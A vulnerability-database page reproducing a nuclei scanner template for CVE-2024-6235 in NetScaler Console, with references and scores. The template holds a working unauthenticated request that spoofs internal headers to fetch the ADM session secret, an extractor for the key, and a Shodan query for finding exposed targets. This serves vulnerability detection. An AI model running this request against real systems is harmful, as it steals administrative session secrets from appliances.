Lucene search
K

NetScaler Console - Sensitive Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

Sensitive information exposure in NetScaler Console identified as CVE-2024-6235, severity critical.

Related
Refs
Code
id: CVE-2024-6235

info:
  name: NetScaler Console - Sensitive Information Disclosure
  author: DhiyaneshDk
  severity: critical
  description: |
    Sensitive information disclosure in NetScaler Console
  impact: |
    Attackers can access sensitive information including session secrets and administrative credentials from the NetScaler Console without proper authentication.
  remediation: |
    Apply the patches specified in Citrix advisory CTX677998 to address the information disclosure vulnerability in NetScaler Console.
  reference:
    - https://support.citrix.com/article/CTX677998
    - https://attackerkb.com/topics/7zebEgmGLs/cve-2024-6235
    - https://nvd.nist.gov/vuln/detail/cve-2024-6235
  classification:
    cve-id: CVE-2024-6235
    cwe-id: CWE-287
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    epss-score: 0.21331
    epss-percentile: 0.97296
    cpe: cpe:2.3:a:citrix:netscaler_console:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"NetScaler Gateway"
  tags: cve,cve2024,netscaler,exposure,vkev,vuln

http:
  - raw:
      - |
        GET /internal/v2/config/mps_secret/ADM_SESSIONID HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/admin_ui/mas/ent/html/main.html
        Content-Type: application/json
        If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
        NITRO_WEB_APPLICATION: true
        Tenant-Name: Owner
        User-Name: nsroot
        Mps-Internal-Request: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"mps_secret":'
          - 'ADM_SESSIONID'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        name: adm_sessionid_key
        json:
          - '.mps_secret[0].key_value'
# digest: 4a0a00473045022077e481d18e5ad48106ab820d67cf4a25bac338a19584b913d5c89736eb5e6f87022100bca4673ba235f288273436b6a57e62b4331b3b5612b63523186b6c52c83b43dd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
CVSS 49.4
EPSS0.21331
SSVC
43